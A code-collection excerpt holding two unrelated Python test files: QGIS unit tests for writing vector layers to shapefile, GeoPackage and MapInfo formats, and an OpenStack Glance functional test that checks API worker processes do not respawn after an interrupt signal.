from osgeo import gdal, ogr
from qgis.testing import start_app, unittest
from utilities import writeShape, compareWkt, unitTestDataPath
TEST_DATA_DIR = unitTestDataPath()
start_app()
def GDAL_COMPUTE_VERSION(maj, min, rev):
return ((maj) * 1000000 + (min) * 10000 + (rev) * 100)
class TestFieldValueConverter(QgsVectorFileWriter.FieldValueConverter):
def __init__(self, layer):
QgsVectorFileWriter.FieldValueConverter.__init__(self)
self.layer = layer
def fieldDefinition(self, field):
idx = self.layer.fields().indexFromName(field.name())
if idx == 0:
return self.layer.fields()[idx]
elif idx == 2:
return QgsField('conv_attr', QVariant.String)
return QgsField('unexpected_idx')
def convert(self, idx, value):
if idx == 0:
return value
elif idx == 2:
if value == 3:
return 'converted_val'
else:
return 'unexpected_val!'
return 'unexpected_idx'
class TestQgsVectorFileWriter(unittest.TestCase):
mMemoryLayer = None
def testWrite(self):
"""Check we can write a vector file."""
self.mMemoryLayer = QgsVectorLayer(
('Point?crs=epsg:4326&field=name:string(20)&'
'field=age:integer&field=size:double&index=yes'),
'test',
'memory')
self.assertIsNotNone(self.mMemoryLayer, 'Provider not initialized')
myProvider = self.mMemoryLayer.dataProvider()
self.assertIsNotNone(myProvider)
ft = QgsFeature()
ft.setGeometry(QgsGeometry.fromPointXY(QgsPointXY(10, 10)))
ft.setAttributes(['Johny', 20, 0.3])
myResult, myFeatures = myProvider.addFeatures([ft])
self.assertTrue(myResult)
self.assertTrue(myFeatures)
writeShape(self.mMemoryLayer, 'writetest.shp')
def testWriteWithBoolField(self):
# init connection string
dbconn = 'dbname=\'qgis_test\''
if 'QGIS_PGTEST_DB' in os.environ:
dbconn = os.environ['QGIS_PGTEST_DB']
# create a vector layer
vl = QgsVectorLayer('{} table="qgis_test"."boolean_table" sql='.format(dbconn), "testbool", "postgres")
self.assertTrue(vl.isValid())
# check that 1 of its fields is a bool
fields = vl.fields()
self.assertEqual(fields.at(fields.indexFromName('fld1')).type(), QVariant.Bool)
# write a gpkg package with a bool field
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
filename = os.path.join(str(QDir.tempPath()), 'with_bool_field')
rc, errmsg = QgsVectorFileWriter.writeAsVectorFormat(vl,
filename,
'utf-8',
crs,
'GPKG')
self.assertEqual(rc, QgsVectorFileWriter.NoError)
# open the resulting geopackage
vl = QgsVectorLayer(filename + '.gpkg', '', 'ogr')
self.assertTrue(vl.isValid())
fields = vl.fields()
# test type of converted field
idx = fields.indexFromName('fld1')
self.assertEqual(fields.at(idx).type(), QVariant.Bool)
# test values
self.assertEqual(vl.getFeature(1).attributes()[idx], 1)
self.assertEqual(vl.getFeature(2).attributes()[idx], 0)
def testDateTimeWriteShapefile(self):
"""Check writing date and time fields to an ESRI shapefile."""
ml = QgsVectorLayer(
('Point?crs=epsg:4326&field=id:int&'
'field=date_f:date&field=time_f:time&field=dt_f:datetime'),
'test',
'memory')
self.assertTrue(ml.isValid())
provider = ml.dataProvider()
self.assertIsNotNone(provider)
ft = QgsFeature()
ft.setGeometry(QgsGeometry.fromPointXY(QgsPointXY(10, 10)))
ft.setAttributes([1, QDate(2014, 3, 5), QTime(13, 45, 22), QDateTime(QDate(2014, 3, 5), QTime(13, 45, 22))])
res, features = provider.addFeatures([ft])
self.assertTrue(res)
self.assertTrue(features)
dest_file_name = os.path.join(str(QDir.tempPath()), 'datetime.shp')
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'ESRI Shapefile')
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
fields = created_layer.dataProvider().fields()
self.assertEqual(fields.at(fields.indexFromName('date_f')).type(), QVariant.Date)
# shapefiles do not support time types, result should be string
self.assertEqual(fields.at(fields.indexFromName('time_f')).type(), QVariant.String)
# shapefiles do not support datetime types, result should be string
self.assertEqual(fields.at(fields.indexFromName('dt_f')).type(), QVariant.String)
f = next(created_layer.getFeatures(QgsFeatureRequest()))
date_idx = created_layer.fields().lookupField('date_f')
self.assertIsInstance(f.attributes()[date_idx], QDate)
self.assertEqual(f.attributes()[date_idx], QDate(2014, 3, 5))
time_idx = created_layer.fields().lookupField('time_f')
# shapefiles do not support time types
self.assertIsInstance(f.attributes()[time_idx], str)
self.assertEqual(f.attributes()[time_idx], '13:45:22')
# shapefiles do not support datetime types
datetime_idx = created_layer.fields().lookupField('dt_f')
self.assertIsInstance(f.attributes()[datetime_idx], str)
self.assertEqual(f.attributes()[datetime_idx],
QDateTime(QDate(2014, 3, 5), QTime(13, 45, 22)).toString("yyyy/MM/dd hh:mm:ss.zzz"))
def testWriterWithExtent(self):
"""Check writing using extent filter."""
source_file = os.path.join(TEST_DATA_DIR, 'points.shp')
source_layer = QgsVectorLayer(source_file, 'Points', 'ogr')
self.assertTrue(source_layer.isValid())
options = QgsVectorFileWriter.SaveVectorOptions()
options.driverName = 'ESRI Shapefile'
options.filterExtent = QgsRectangle(-111, 26, -96, 38)
dest_file_name = os.path.join(str(QDir.tempPath()), 'extent_no_transform.shp')
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
source_layer,
dest_file_name,
options)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
features = [f for f in created_layer.getFeatures()]
self.assertEqual(len(features), 5)
for f in features:
self.assertTrue(f.geometry().intersects(options.filterExtent))
def testWriterWithExtentAndReprojection(self):
"""Check writing using extent filter with reprojection."""
source_file = os.path.join(TEST_DATA_DIR, 'points.shp')
source_layer = QgsVectorLayer(source_file, 'Points', 'ogr')
self.assertTrue(source_layer.isValid())
options = QgsVectorFileWriter.SaveVectorOptions()
options.driverName = 'ESRI Shapefile'
options.filterExtent = QgsRectangle(-12511460, 3045157, -10646621, 4683497)
options.ct = QgsCoordinateTransform(source_layer.crs(), QgsCoordinateReferenceSystem.fromEpsgId(3785))
dest_file_name = os.path.join(str(QDir.tempPath()), 'extent_transform.shp')
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
source_layer,
dest_file_name,
options)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
features = [f for f in created_layer.getFeatures()]
self.assertEqual(len(features), 5)
for f in features:
self.assertTrue(f.geometry().intersects(options.filterExtent))
def testDateTimeWriteTabfile(self):
"""Check writing date and time fields to an MapInfo tabfile."""
ml = QgsVectorLayer(
('Point?crs=epsg:4326&field=id:int&'
'field=date_f:date&field=time_f:time&field=dt_f:datetime'),
'test',
'memory')
self.assertIsNotNone(ml, 'Provider not initialized')
self.assertTrue(ml.isValid(), 'Source layer not valid')
provider = ml.dataProvider()
self.assertIsNotNone(provider)
ft = QgsFeature()
ft.setGeometry(QgsGeometry.fromPointXY(QgsPointXY(10, 10)))
ft.setAttributes([1, QDate(2014, 3, 5), QTime(13, 45, 22), QDateTime(QDate(2014, 3, 5), QTime(13, 45, 22))])
res, features = provider.addFeatures([ft])
self.assertTrue(res)
self.assertTrue(features)
dest_file_name = os.path.join(str(QDir.tempPath()), 'datetime.tab')
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'MapInfo File')
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
fields = created_layer.dataProvider().fields()
self.assertEqual(fields.at(fields.indexFromName('date_f')).type(), QVariant.Date)
self.assertEqual(fields.at(fields.indexFromName('time_f')).type(), QVariant.Time)
self.assertEqual(fields.at(fields.indexFromName('dt_f')).type(), QVariant.DateTime)
f = next(created_layer.getFeatures(QgsFeatureRequest()))
date_idx = created_layer.fields().lookupField('date_f')
self.assertIsInstance(f.attributes()[date_idx], QDate)
self.assertEqual(f.attributes()[date_idx], QDate(2014, 3, 5))
time_idx = created_layer.fields().lookupField('time_f')
self.assertIsInstance(f.attributes()[time_idx], QTime)
self.assertEqual(f.attributes()[time_idx], QTime(13, 45, 22))
datetime_idx = created_layer.fields().lookupField('dt_f')
self.assertIsInstance(f.attributes()[datetime_idx], QDateTime)
self.assertEqual(f.attributes()[datetime_idx], QDateTime(QDate(2014, 3, 5), QTime(13, 45, 22)))
def testWriteShapefileWithZ(self):
"""Check writing geometries with Z dimension to an ESRI shapefile."""
# start by saving a memory layer and forcing z
ml = QgsVectorLayer(
('Point?crs=epsg:4326&field=id:int'),
'test',
'memory')
self.assertIsNotNone(ml, 'Provider not initialized')
self.assertTrue(ml.isValid(), 'Source layer not valid')
provider = ml.dataProvider()
self.assertIsNotNone(provider)
ft = QgsFeature()
ft.setGeometry(QgsGeometry.fromWkt('PointZ (1 2 3)'))
ft.setAttributes([1])
res, features = provider.addFeatures([ft])
self.assertTrue(res)
self.assertTrue(features)
# check with both a standard PointZ and 25d style Point25D type
for t in [QgsWkbTypes.PointZ, QgsWkbTypes.Point25D]:
dest_file_name = os.path.join(str(QDir.tempPath()), 'point_{}.shp'.format(QgsWkbTypes.displayString(t)))
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'ESRI Shapefile',
overrideGeometryType=t)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
f = next(created_layer.getFeatures(QgsFeatureRequest()))
g = f.geometry()
wkt = g.asWkt()
expWkt = 'PointZ (1 2 3)'
self.assertTrue(compareWkt(expWkt, wkt),
"saving geometry with Z failed: mismatch Expected:\n%s\nGot:\n%s\n" % (expWkt, wkt))
# also try saving out the shapefile version again, as an extra test
# this tests that saving a layer with z WITHOUT explicitly telling the writer to keep z values,
# will stay retain the z values
dest_file_name = os.path.join(str(QDir.tempPath()),
'point_{}_copy.shp'.format(QgsWkbTypes.displayString(t)))
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
created_layer,
dest_file_name,
'utf-8',
crs,
'ESRI Shapefile')
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer_from_shp = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
f = next(created_layer_from_shp.getFeatures(QgsFeatureRequest()))
g = f.geometry()
wkt = g.asWkt()
self.assertTrue(compareWkt(expWkt, wkt),
"saving geometry with Z failed: mismatch Expected:\n%s\nGot:\n%s\n" % (expWkt, wkt))
def testWriteShapefileWithMultiConversion(self):
"""Check writing geometries to an ESRI shapefile with conversion to multi."""
ml = QgsVectorLayer(
('Point?crs=epsg:4326&field=id:int'),
'test',
'memory')
self.assertIsNotNone(ml, 'Provider not initialized')
self.assertTrue(ml.isValid(), 'Source layer not valid')
provider = ml.dataProvider()
self.assertIsNotNone(provider)
ft = QgsFeature()
ft.setGeometry(QgsGeometry.fromWkt('Point (1 2)'))
ft.setAttributes([1])
res, features = provider.addFeatures([ft])
self.assertTrue(res)
self.assertTrue(features)
dest_file_name = os.path.join(str(QDir.tempPath()), 'to_multi.shp')
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'ESRI Shapefile',
forceMulti=True)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
f = next(created_layer.getFeatures(QgsFeatureRequest()))
g = f.geometry()
wkt = g.asWkt()
expWkt = 'MultiPoint ((1 2))'
self.assertTrue(compareWkt(expWkt, wkt),
"saving geometry with multi conversion failed: mismatch Expected:\n%s\nGot:\n%s\n" % (
expWkt, wkt))
def testWriteShapefileWithAttributeSubsets(self):
"""Tests writing subsets of attributes to files."""
ml = QgsVectorLayer(
('Point?crs=epsg:4326&field=id:int&field=field1:int&field=field2:int&field=field3:int'),
'test',
'memory')
self.assertIsNotNone(ml, 'Provider not initialized')
self.assertTrue(ml.isValid(), 'Source layer not valid')
provider = ml.dataProvider()
self.assertIsNotNone(provider)
ft = QgsFeature()
ft.setGeometry(QgsGeometry.fromWkt('Point (1 2)'))
ft.setAttributes([1, 11, 12, 13])
res, features = provider.addFeatures([ft])
self.assertTrue(res)
self.assertTrue(features)
# first write out with all attributes
dest_file_name = os.path.join(str(QDir.tempPath()), 'all_attributes.shp')
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'ESRI Shapefile',
attributes=[])
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
self.assertEqual(created_layer.fields().count(), 4)
f = next(created_layer.getFeatures(QgsFeatureRequest()))
self.assertEqual(f['id'], 1)
self.assertEqual(f['field1'], 11)
self.assertEqual(f['field2'], 12)
self.assertEqual(f['field3'], 13)
# now test writing out only a subset of attributes
dest_file_name = os.path.join(str(QDir.tempPath()), 'subset_attributes.shp')
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'ESRI Shapefile',
attributes=[1, 3])
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
self.assertEqual(created_layer.fields().count(), 2)
f = next(created_layer.getFeatures(QgsFeatureRequest()))
self.assertEqual(f['field1'], 11)
self.assertEqual(f['field3'], 13)
# finally test writing no attributes
dest_file_name = os.path.join(str(QDir.tempPath()), 'no_attributes.shp')
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'ESRI Shapefile',
skipAttributeCreation=True)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
# expect only a default 'FID' field for shapefiles
self.assertEqual(created_layer.fields().count(), 1)
self.assertEqual(created_layer.fields()[0].name(), 'FID')
# in this case we also check that the geometry exists, to make sure feature has been correctly written
# even without attributes
f = next(created_layer.getFeatures(QgsFeatureRequest()))
g = f.geometry()
wkt = g.asWkt()
expWkt = 'Point (1 2)'
self.assertTrue(compareWkt(expWkt, wkt),
"geometry not saved correctly when saving without attributes : mismatch Expected:\n%s\nGot:\n%s\n" % (
expWkt, wkt))
self.assertEqual(f['FID'], 0)
def testValueConverter(self):
"""Tests writing a layer with a field value converter."""
ml = QgsVectorLayer(
('Point?field=nonconv:int&field=ignored:string&field=converted:int'),
'test',
'memory')
self.assertIsNotNone(ml, 'Provider not initialized')
self.assertTrue(ml.isValid(), 'Source layer not valid')
provider = ml.dataProvider()
self.assertIsNotNone(provider)
self.assertEqual(ml.fields().count(), 3)
ft = QgsFeature()
ft.setAttributes([1, 'ignored', 3])
res, features = provider.addFeatures([ft])
self.assertTrue(res)
self.assertTrue(features)
dest_file_name = os.path.join(str(QDir.tempPath()), 'value_converter.shp')
converter = TestFieldValueConverter(ml)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
QgsCoordinateReferenceSystem(),
'ESRI Shapefile',
attributes=[0, 2],
fieldValueConverter=converter)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
self.assertEqual(created_layer.fields().count(), 2)
f = next(created_layer.getFeatures(QgsFeatureRequest()))
self.assertEqual(f['nonconv'], 1)
self.assertEqual(f['conv_attr'], 'converted_val')
def testInteger64WriteTabfile(self):
"""Check writing Integer64 fields to an MapInfo tabfile (which does not support that type)."""
ml = QgsVectorLayer(
('Point?crs=epsg:4326&field=int8:int8'),
'test',
'memory')
self.assertIsNotNone(ml, 'Provider not initialized')
self.assertTrue(ml.isValid(), 'Source layer not valid')
provider = ml.dataProvider()
self.assertIsNotNone(provider)
ft = QgsFeature()
ft.setAttributes([2123456789])
res, features = provider.addFeatures([ft])
self.assertTrue(res)
self.assertTrue(features)
dest_file_name = os.path.join(str(QDir.tempPath()), 'integer64.tab')
crs = QgsCoordinateReferenceSystem()
crs.createFromId(4326, QgsCoordinateReferenceSystem.EpsgCrsId)
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
dest_file_name,
'utf-8',
crs,
'MapInfo File')
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
# Open result and check
created_layer = QgsVectorLayer('{}|layerid=0'.format(dest_file_name), 'test', 'ogr')
fields = created_layer.dataProvider().fields()
self.assertEqual(fields.at(fields.indexFromName('int8')).type(), QVariant.Double)
f = next(created_layer.getFeatures(QgsFeatureRequest()))
int8_idx = created_layer.fields().lookupField('int8')
self.assertEqual(f.attributes()[int8_idx], 2123456789)
def testDefaultDatasetOptions(self):
""" Test retrieving default dataset options for a format """
# NOTE - feel free to adapt these if the defaults change!
options = QgsVectorFileWriter.defaultDatasetOptions('not a format')
self.assertEqual(options, [])
options = QgsVectorFileWriter.defaultDatasetOptions('ESRI Shapefile')
self.assertEqual(options, [])
options = QgsVectorFileWriter.defaultDatasetOptions('GML')
# just test a few
self.assertTrue('GML3_LONGSRS=YES' in options)
self.assertTrue('STRIP_PREFIX=NO' in options)
def testDefaultLayerOptions(self):
""" Test retrieving default layer options for a format """
# NOTE - feel free to adapt these if the defaults change!
options = QgsVectorFileWriter.defaultLayerOptions('not a format')
self.assertEqual(options, [])
options = QgsVectorFileWriter.defaultLayerOptions('ESRI Shapefile')
self.assertEqual(options, ['RESIZE=NO'])
options = QgsVectorFileWriter.defaultLayerOptions('GML')
self.assertEqual(options, [])
def testOverwriteLayer(self):
"""Tests writing a layer with a field value converter."""
ml = QgsVectorLayer('Point?field=firstfield:int', 'test', 'memory')
provider = ml.dataProvider()
ft = QgsFeature()
ft.setAttributes([1])
provider.addFeatures([ft])
options = QgsVectorFileWriter.SaveVectorOptions()
options.driverName = 'GPKG'
options.layerName = 'test'
filename = '/vsimem/out.gpkg'
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
filename,
options)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
ds = ogr.Open(filename, update=1)
lyr = ds.GetLayerByName('test')
self.assertIsNotNone(lyr)
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 1)
ds.CreateLayer('another_layer')
del f
del lyr
del ds
caps = QgsVectorFileWriter.editionCapabilities(filename)
self.assertTrue((caps & QgsVectorFileWriter.CanAddNewLayer))
self.assertTrue((caps & QgsVectorFileWriter.CanAppendToExistingLayer))
self.assertTrue((caps & QgsVectorFileWriter.CanAddNewFieldsToExistingLayer))
self.assertTrue((caps & QgsVectorFileWriter.CanDeleteLayer))
self.assertTrue(QgsVectorFileWriter.targetLayerExists(filename, 'test'))
self.assertFalse(QgsVectorFileWriter.areThereNewFieldsToCreate(filename, 'test', ml, [0]))
# Test CreateOrOverwriteLayer
ml = QgsVectorLayer('Point?field=firstfield:int', 'test', 'memory')
provider = ml.dataProvider()
ft = QgsFeature()
ft.setAttributes([2])
provider.addFeatures([ft])
options = QgsVectorFileWriter.SaveVectorOptions()
options.driverName = 'GPKG'
options.layerName = 'test'
options.actionOnExistingFile = QgsVectorFileWriter.CreateOrOverwriteLayer
filename = '/vsimem/out.gpkg'
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
filename,
options)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
ds = ogr.Open(filename)
lyr = ds.GetLayerByName('test')
self.assertIsNotNone(lyr)
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 2)
# another_layer should still exist
self.assertIsNotNone(ds.GetLayerByName('another_layer'))
del f
del lyr
del ds
# Test CreateOrOverwriteFile
ml = QgsVectorLayer('Point?field=firstfield:int', 'test', 'memory')
provider = ml.dataProvider()
ft = QgsFeature()
ft.setAttributes([3])
provider.addFeatures([ft])
options = QgsVectorFileWriter.SaveVectorOptions()
options.driverName = 'GPKG'
options.layerName = 'test'
filename = '/vsimem/out.gpkg'
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
filename,
options)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
ds = ogr.Open(filename)
lyr = ds.GetLayerByName('test')
self.assertIsNotNone(lyr)
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 3)
# another_layer should no longer exist
self.assertIsNone(ds.GetLayerByName('another_layer'))
del f
del lyr
del ds
# Test AppendToLayerNoNewFields
ml = QgsVectorLayer('Point?field=firstfield:int&field=secondfield:int', 'test', 'memory')
provider = ml.dataProvider()
ft = QgsFeature()
ft.setAttributes([4, -10])
provider.addFeatures([ft])
self.assertTrue(QgsVectorFileWriter.areThereNewFieldsToCreate(filename, 'test', ml, [0, 1]))
options = QgsVectorFileWriter.SaveVectorOptions()
options.driverName = 'GPKG'
options.layerName = 'test'
options.actionOnExistingFile = QgsVectorFileWriter.AppendToLayerNoNewFields
filename = '/vsimem/out.gpkg'
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
filename,
options)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
ds = ogr.Open(filename)
lyr = ds.GetLayerByName('test')
self.assertEqual(lyr.GetLayerDefn().GetFieldCount(), 1)
self.assertIsNotNone(lyr)
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 3)
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 4)
del f
del lyr
del ds
# Test AppendToLayerAddFields
ml = QgsVectorLayer('Point?field=firstfield:int&field=secondfield:int', 'test', 'memory')
provider = ml.dataProvider()
ft = QgsFeature()
ft.setAttributes([5, -1])
provider.addFeatures([ft])
self.assertTrue(QgsVectorFileWriter.areThereNewFieldsToCreate(filename, 'test', ml, [0, 1]))
options = QgsVectorFileWriter.SaveVectorOptions()
options.driverName = 'GPKG'
options.layerName = 'test'
options.actionOnExistingFile = QgsVectorFileWriter.AppendToLayerAddFields
filename = '/vsimem/out.gpkg'
write_result, error_message = QgsVectorFileWriter.writeAsVectorFormat(
ml,
filename,
options)
self.assertEqual(write_result, QgsVectorFileWriter.NoError, error_message)
ds = ogr.Open(filename)
lyr = ds.GetLayerByName('test')
self.assertEqual(lyr.GetLayerDefn().GetFieldCount(), 2)
self.assertIsNotNone(lyr)
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 3)
if hasattr(f, "IsFieldSetAndNotNull"):
# GDAL >= 2.2
self.assertFalse(f.IsFieldSetAndNotNull('secondfield'))
else:
self.assertFalse(f.IsFieldSet('secondfield'))
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 4)
if hasattr(f, "IsFieldSetAndNotNull"):
self.assertFalse(f.IsFieldSetAndNotNull('secondfield'))
else:
self.assertFalse(f.IsFieldSet('secondfield'))
f = lyr.GetNextFeature()
self.assertEqual(f['firstfield'], 5)
self.assertEqual(f['secondfield'], -1)
del f
del lyr
del ds
gdal.Unlink(filename)
def testSupportedFiltersAndFormat(self):
# test with formats in recommended order
formats = QgsVectorFileWriter.supportedFiltersAndFormats(QgsVectorFileWriter.SortRecommended)
self.assertEqual(formats[0].filterString, 'GeoPackage (*.gpkg *.GPKG)')
self.assertEqual(formats[0].driverName, 'GPKG')
self.assertEqual(formats[1].filterString, 'ESRI Shapefile (*.shp *.SHP)')
self.assertEqual(formats[1].driverName, 'ESRI Shapefile')
self.assertTrue('ODS' in [f.driverName for f in formats])
# alphabetical sorting
formats2 = QgsVectorFileWriter.supportedFiltersAndFormats(QgsVectorFileWriter.VectorFormatOptions())
self.assertTrue(formats2[0].driverName < formats2[1].driverName)
self.assertCountEqual([f.driverName for f in formats], [f.driverName for f in formats2])
self.assertNotEqual(formats2[0].driverName, 'GeoPackage')
# skip non-spatial
formats = QgsVectorFileWriter.supportedFiltersAndFormats(QgsVectorFileWriter.SkipNonSpatialFormats)
self.assertFalse('ODS' in [f.driverName for f in formats])
def testOgrDriverList(self):
# test with drivers in recommended order
drivers = QgsVectorFileWriter.ogrDriverList(QgsVectorFileWriter.SortRecommended)
self.assertEqual(drivers[0].longName, 'GeoPackage')
self.assertEqual(drivers[0].driverName, 'GPKG')
self.assertEqual(drivers[1].longName, 'ESRI Shapefile')
self.assertEqual(drivers[1].driverName, 'ESRI Shapefile')
self.assertTrue('ODS' in [f.driverName for f in drivers])
# alphabetical sorting
drivers2 = QgsVectorFileWriter.ogrDriverList(QgsVectorFileWriter.VectorFormatOptions())
self.assertTrue(drivers2[0].longName < drivers2[1].longName)
self.assertCountEqual([d.driverName for d in drivers], [d.driverName for d in drivers2])
self.assertNotEqual(drivers2[0].driverName, 'GPKG')
# skip non-spatial
formats = QgsVectorFileWriter.ogrDriverList(QgsVectorFileWriter.SkipNonSpatialFormats)
self.assertFalse('ODS' in [f.driverName for f in formats])
def testSupportedFormatExtensions(self):
formats = QgsVectorFileWriter.supportedFormatExtensions()
self.assertTrue('gpkg' in formats)
self.assertFalse('exe' in formats)
self.assertEqual(formats[0], 'gpkg')
self.assertEqual(formats[1], 'shp')
self.assertTrue('ods' in formats)
# alphabetical sorting
formats2 = QgsVectorFileWriter.supportedFormatExtensions(QgsVectorFileWriter.VectorFormatOptions())
self.assertTrue(formats2[0] < formats2[1])
self.assertCountEqual(formats, formats2)
self.assertNotEqual(formats2[0], 'gpkg')
formats = QgsVectorFileWriter.supportedFormatExtensions(QgsVectorFileWriter.SkipNonSpatialFormats)
self.assertFalse('ods' in formats)
def testFileFilterString(self):
formats = QgsVectorFileWriter.fileFilterString()
self.assertTrue('gpkg' in formats)
self.assertTrue('shp' in formats)
self.assertTrue(formats.index('gpkg') < formats.index('shp'))
self.assertTrue('ods' in formats)
# alphabetical sorting
formats2 = QgsVectorFileWriter.fileFilterString(QgsVectorFileWriter.VectorFormatOptions())
self.assertNotEqual(formats.index('gpkg'), formats2.index('gpkg'))
# hide non spatial
formats = QgsVectorFileWriter.fileFilterString(QgsVectorFileWriter.SkipNonSpatialFormats)
self.assertFalse('ods' in formats)
def testDriverForExtension(self):
self.assertEqual(QgsVectorFileWriter.driverForExtension('shp'), 'ESRI Shapefile')
self.assertEqual(QgsVectorFileWriter.driverForExtension('SHP'), 'ESRI Shapefile')
self.assertEqual(QgsVectorFileWriter.driverForExtension('sHp'), 'ESRI Shapefile')
self.assertEqual(QgsVectorFileWriter.driverForExtension('.shp'), 'ESRI Shapefile')
self.assertEqual(QgsVectorFileWriter.driverForExtension('tab'), 'MapInfo File')
self.assertEqual(QgsVectorFileWriter.driverForExtension('.GML'), 'GML')
self.assertEqual(QgsVectorFileWriter.driverForExtension('not a format'), '')
self.assertEqual(QgsVectorFileWriter.driverForExtension(''), '')
if __name__ == '__main__':
unittest.main()
| gpl-2.0 |
saeki-masaki/glance | glance/tests/functional/v1/test_multiprocessing.py | 10 | 2590 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import httplib2
import psutil
# NOTE(jokke): simplified transition to py3, behaves like py2 xrange
from six.moves import range
from glance.tests import functional
from glance.tests.utils import execute
class TestMultiprocessing(functional.FunctionalTest):
"""Functional tests for the bin/glance CLI tool"""
def setUp(self):
self.workers = 2
super(TestMultiprocessing, self).setUp()
def test_multiprocessing(self):
"""Spin up the api servers with multiprocessing on"""
self.cleanup()
self.start_servers(**self.__dict__.copy())
path = "http://%s:%d/v1/images" % ("127.0.0.1", self.api_port)
http = httplib2.Http()
response, content = http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"images": []}', content)
self.stop_servers()
def _get_children(self):
api_pid = self.api_server.process_pid
process = psutil.Process(api_pid)
children = process.get_children()
pids = [str(child.pid) for child in children]
return pids
def test_interrupt_avoids_respawn_storm(self):
"""
Ensure an interrupt signal does not cause a respawn storm.
See bug #978130
"""
self.start_servers(**self.__dict__.copy())
children = self._get_children()
cmd = "kill -INT %s" % ' '.join(children)
execute(cmd, raise_error=True)
for _ in range(9):
# Yeah. This totally isn't a race condition. Randomly fails
# set at 0.05. Works most of the time at 0.10
time.sleep(0.10)
# ensure number of children hasn't grown
self.assertTrue(len(children) >= len(self._get_children()))
for child in self._get_children():
# ensure no new children spawned
self.assertIn(child, children, child)
self.stop_servers()
| apache-2.0 |
